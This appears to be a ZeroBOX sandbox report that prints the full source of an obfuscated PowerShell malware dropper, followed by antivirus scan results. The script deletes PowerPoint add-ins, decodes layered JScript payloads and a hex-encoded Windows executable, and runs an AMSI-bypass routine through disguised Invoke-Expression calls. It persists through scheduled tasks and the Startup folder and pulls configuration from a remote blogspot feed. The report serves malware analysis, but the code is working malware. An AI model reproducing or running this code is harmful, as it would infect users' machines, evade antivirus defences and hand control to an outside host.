Static | ZeroBOX
No static analysis available.
#can't change acuniphynux
Stop-Process -Name "powerpnt" -ErrorAction SilentlyContinue
start-sleep 3
$path = 'C:\Users\*\Downloads\*.ppam'
$path2 = 'C:\Users\*\Desktop\*.ppam'
Remove-Item $path -force -recurse -ErrorAction SilentlyContinue
Remove-Item $path2 -force -recurse -ErrorAction SilentlyContinue
$acuniphynux = "C:\\ProgramData\\MegamindCypher"
New-Item $acuniphynux -ItemType Directory -Force
Function Cum {
param($Pentagone)
$Pentagone = -join ($Pentagone -split '(..)' | ? { $_ } | % { [char][convert]::ToUInt32($_,16) })
return $Pentagone
$J1UAC = '-7-6-6-1-7-2-2-0-4-9-33434-4-1-33432-2-8-6-6-7-5-63435-6--37-4-6-9-63436-63435-2-8-6-6-234-3363431-2-9-73432-7-6-6-1-7-2-2-0-7-0-33434-4-1-234-335-6-33434-6-6-2-8-2-9-33432-7-7-6-8-6-9-634-336-5-2-8-2-1-2-1-53432-53434-2-9-73432-7-4-7-2-7-9-73432-7-6-6-1-7-2-2-0-53431-33434-7-0-6-1-7-2-7--36-5-4-9-63435-7-4-2-8-7-0-2-8--30-7-8--36-6--32-9-2-9-23436--30-7-8--31-23432-7-0-6-1-7-2-7--36-5-4-9-63435-7-4-2-8-7-0-2-8--30-7-8--37-6-2-2-9-2-9-23436--30-7-8--32-23432-23434-7-0-6-1-7-2-7--36-5-4-9-63435-7-4-2-8-7-0-2-8--30-7-8--37--35-2-9-2-9-23436--30-7-8---3323432-23434-7-0-6-1-7-2-7--36-5-4-9-63435-7-4-2-8-7-0-2-8--30-7-8--37---332-9-2-9-23436--30-7-8--34-23432-7-0-6-1-7-2-7--36-5-4-9-63435-7-4-2-8-7-0-2-8--30-7-8--37--37-2-9-2-9-23436--30-7-8--35-23431-2-8-7-0-6-1-7-2-7--36-5-4-9-63435-7-4-2-8-7-0-2-8--30-7-8--37-6--32-9-2-9-23436--30-7-8--36-2-9-23432-7-0-6-1-7-2-7--36-5-4-9-63435-7-4-2-8-7-0-2-8--30-7-8--37-6-5-2-9-2-9-23436--30-7-8--37-23431-2-8-7-0-6-1-7-2-7--36-5-4-9-63435-7-4-2-8-7-0-2-8--30-7-8--37
$J2Main = '-6-6-7-5-63435-6--37-4-6-9-63436-63435-2-0-7-7-2-8-2-9-73432-7-6-6-1-7-2-2-0-4-9-33434-53432-2-7-5--3634-336-5-6-5-7-0-2-7-234-332-7--38--38--35--35--39--34-4-7-434-337-2-434-335-8-5-5-2-7-234-332-7--38-----2--30--39--35-4-8-5-8-5-5-7-6-43434-63436-2-7-234-332-7--37-43436-6--35-8-6-9-5-4-4-2-2-7-234-332-7-63435-6-5-7-7-33431-73432-4-6--39-----5-4-4-4---332--32-23434--31-4--34-6--30-23434--31--31-4-4--30-23434-4-1-4-4-4-2--39-23434--30--30-4---330--34-4-6-4-4--35--38-4-1--30-4-2-73434-2-7-234-332-7--31--35--36--31--35-7-9-6-2-6-8-7-8-6-2-4-9-2-7-234-332-7--31--34-----4--32--30-43432-43435-7-5-6-6-4-6-6--32-7-234-332-7--31-----0--37--31--34--34-4-8-7-9-6-1-6-5-6-7-5-7-2-7-234-332-7-7-2-6-5-7-0-634-336-1-6--36-5-2-7-234-332-7--32--34-4-2-434-334--37-0-4-5-6-1-2-7-234-332-7--31--30-7-7-6--37-6-5-1-7-0-43432-2-7-234-332-7--32--34-53431-6-8-4-5-43432-7-8-6-5-2-7-234-332-7--31--30-5-4-5-0-4-7-63434-63434-7-1-2-7-234-332-7-5-2-7-5-63435-2-7-234-332-7--31--30-7-7-6--34-9-6-6-63436-4-4-2-7-234-332-7--38--38-
$T1 = $acuniphynux + "\\OutlookUpdate.js"
$T2 = $acuniphynux + "\\OneDriveUpdate.js"
$X1 = Cum(Cum(Cum $J1UAC))
$X2 = Cum(Cum(Cum $J2Main))
[IO.File]::WriteAllText($T1, $X1)
[IO.File]::WriteAllText($T2, $X2)
$WS = 'wscript.exe //b //e:jscript'
schtasks /create /sc MINUTE /mo 120 /tn MainChrome /F /tr "$WS $T2"
schtasks /create /sc MINUTE /mo 143 /tn ChromeUAC /F /tr "$WS $T1"
$Minugchapali = @'
Stop-Process -Name "RegSvcs" -ErrorAction SilentlyContinue
Stop-Process -Name "msbuild" -ErrorAction SilentlyContinue
Stop-Process -Name "CasPol" -ErrorAction SilentlyContinue
Stop-Process -Name "jsc" -ErrorAction SilentlyContinue
Stop-Process -Name "aspnet_compiler" -ErrorAction SilentlyContinue
} catch { }
Function Cum {
param($Pentagone)
$Pentagone = -join ($Pentagone -split '(..)' | ? { $_ } | % { [char][convert]::ToUInt32($_,16) })
return $Pentagone
$AntiCrisper = '4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000504500004C01030012F369630000000000000000E00002010B0108000004080000080000000000000E220800002000000000000000004000002000000002000004000000000000000400000000000000008008000002000000000000020000000000100000100000000010000010000000000000100000000000000000000000C02108004B000000004008000006000000000000000000000000000000000000006008000C00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000200000080000000000000000000000082000004800000000000000000000002E7465787400000014020800002000000004080000020000000000000000000000000000200000602E7273726300000000060000004008000006000000060800000000000000000000000000400000402E72656C6F6300000C0000000060080000020000000C0800000000000000000000000000400000420000000000000000
$GORMAX32 = '46756E6374696F6E20414D53494C490A7B0A24414D49203D2027<533343332<5<2<6<5<6<6<533343334<233343335<2<8<2<2<733343332<<30<733343334<2<2<2<0<233343334<6<6<2<7<4<1<7<<37<<32<7<233343332<2<7<6<5<633343334<2<7<233343332<2<7<6<2<63334<33337<9<2<7<2<9<233343335<2<8<2<2<733343332<<30<733343334<2<2<2<0<233343334<6<6<2<7<4<7<6<5<2<7<233343332<2<7<7<4<5<4<2<7<233343332<2<7<7<9<7<0<6<5<2<7<2<9<2<8<2<7<5<<37<9<7<<37<4<6<5<633343334<233343335<433343334<6<1<633343335<6<1<6<7<6<5<633343334<6<5<633343335<7<4<233343335<4<1<7<5<7<4<633343336<633343334<6<1<7<4<6<9<633343336<633343335<233343335<4<1<633343334<7<<32<7<233343332<2<7<6<9<5<5<7<4<6<9<63334<33337<<32<7<2<9<233343335<2<8<2<2<733343332<<30<733343334<2<2<2<0<233343334<6<6<2<7<4<7<6<5<2<7<233343332<2<7<7<4<4<6<6<9<2<7<233343332<2<7<6<5<63334<33336<4<2<7<2<9<2<8<2<7<6<1<633343334<2<7<233343332<2<7<7<<36<9<4<9<633343335<6<9<7<4<4<6<6<1<6<9<63334<33336<5<6<4<2<7<23334<33332<7<433343335<633343336<633343335<5<0<7<5<2<7<233343332<2<7<6<2<63334<33336<9<6<<323334<33335<<3
$INTEL = $GORMAX32.replace('<','3333333').replace('>','444')
(Cum $INTEL) | .('{x}{9}'.replace('9','0').replace('x','1')-f'lun','%%').replace('%%','I').replace('lun','EX')
#the File will start cuming to your pc
[IO.File]::WriteAllText("$acuniphynux\\CypherDeptography.~+~", $Minugchapali)
$Minugchapali | .('{x}{9}'.replace('9','0').replace('x','1')-f'lun','%%').replace('%%','I').replace('lun','EX')
$link = 'https://www.3kdjfdkwqw.blogspot.com/atom.xml'
$sim = '-7-6-6-1-7-2-2-0-7-0-33434-4-1-33432-2-8-6-6-7-5-63435-6--37-4-6-9-63436-63435-2-8-7-6-234-336-6-2-9-73432-7-6-6-1-7-2-2-0-63436-33434-4-1-234-3363431-33434-7-6-2-8-2-9-33432-7-7-6-8-6-9-634-336-5-2-8-2-1-2-1-53432-53434-2-9-73432-7-4-7-2-7-9-73432-7-6-6-1-7-2-2-0-5-6-33434-23434-7-0-6-1-7-2-7--36-5-4-9-63435-7-4-2-8-63436-2-8--30-7-8--31---336-4-2-9-2-9-23436--30-7-8--31-23432-23434-7-0-6-1-7-2-7--36-5-4-9-63435-7-4-2-8-63436-2-8--30-7-8--31-----0-2-9-2-9-23436--30-7-8--32-23432-23434-7-0-6-1-7-2-7--36-5-4-9-63435-7-4-2-8-63436-2-8--30-7-8--31-----5-2-9-2-9-23436--30-7-8---3323432-23434-7-0-6-1-7-2-7--36-5-4-9-63435-7-4-2-8-63436-2-8--30-7-8--31-----9-2-9-2-9-23436--30-7-8--34-23431-2-8-23434-7-0-6-1-7-2-7--36-5-4-9-63435-7-4-2-8-63436-2-8--30-7-8--31-----4-2-9-2-9-23436--30-7-8--35-2-9-23432-23434-7-0-6-1-7-2-7--36-5-4-9-63435-7-4-2-8-63436-2-8--30-7-8--31-----8-2-9-2-9-23436--30-7-8--36-23431-2-8-23434-7-0-6-1-7-2-7--36-5-4-9-63435-7-4-2-8-63436-2-8--30-7-8--31---336--32-9-2-9-23436--30-7-8--37-2-9
$shemale = Cum(Cum(Cum $sim))
$sexi = $shemale.replace('stepsis',$link)
[IO.File]::WriteAllText("$acuniphynux\\Drivers.js", $sexi)
schtasks /create /sc MINUTE /mo 132 /tn Driversed /F /tr "$WS C:\\ProgramData\\MegamindCypher\\Drivers.js"
#can not change this
$startup = [environment]::getfolderpath("Startup")
[string]$sourceDirectory = "C:\\ProgramData\\MegamindCypher\\*"
[string]$destinationDirectory = $startup
Copy-item -Force -Recurse -Verbose $sourceDirectory -Destination $destinationDirectory
Remove-Item "$destinationDirectory\*.~+~" -Force -recurse -ErrorAction SilentlyContinue
Remove-Item "$destinationDirectory\*.vbs" -Force -recurse -ErrorAction SilentlyContinue
Remove-Item "$destinationDirectory\*.exe" -Force -recurse -ErrorAction SilentlyContinue
#Directory not Changeable option PhynthysisinggomilinoPULPUL
#The Code is made By #MXJIGIJIGI
Antivirus Signature
Bkav Clean
Lionic Clean
MicroWorld-eScan Clean
ClamAV Clean
CMC Clean
CAT-QuickHeal Clean
McAfee Clean
Malwarebytes Clean
VIPRE Clean
Sangfor Clean
K7AntiVirus Clean
K7GW Clean
Baidu Clean
VirIT Clean
Cyren Clean
Symantec ML.Attribute.HighConfidence
ESET-NOD32 Clean
TrendMicro-HouseCall Clean
Avast Script:SNH-gen [Trj]
Cynet Clean
Kaspersky HEUR:Trojan.PowerShell.Kryptik.gen
BitDefender Clean
NANO-Antivirus Clean
ViRobot Clean
Rising Clean
Ad-Aware Clean
Emsisoft Clean
Comodo Clean
F-Secure Clean
DrWeb Clean
Zillya Clean
TrendMicro Clean
McAfee-GW-Edition Clean
FireEye Clean
Sophos Clean
Ikarus Clean
Jiangmin Clean
Avira Clean
Antiy-AVL Clean
Kingsoft Clean
Microsoft Clean
Gridinsoft Clean
Arcabit Clean
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Trojan.PowerShell.Kryptik.gen
GData Clean
Google Clean
AhnLab-V3 Clean
Acronis Clean
ALYac Clean
MAX Clean
VBA32 Clean
Zoner Clean
Tencent Clean
Yandex Clean
TACHYON Clean
MaxSecure Clean
Fortinet Clean
BitDefenderTheta Clean
AVG Script:SNH-gen [Trj]
Panda Clean
No IRMA results available.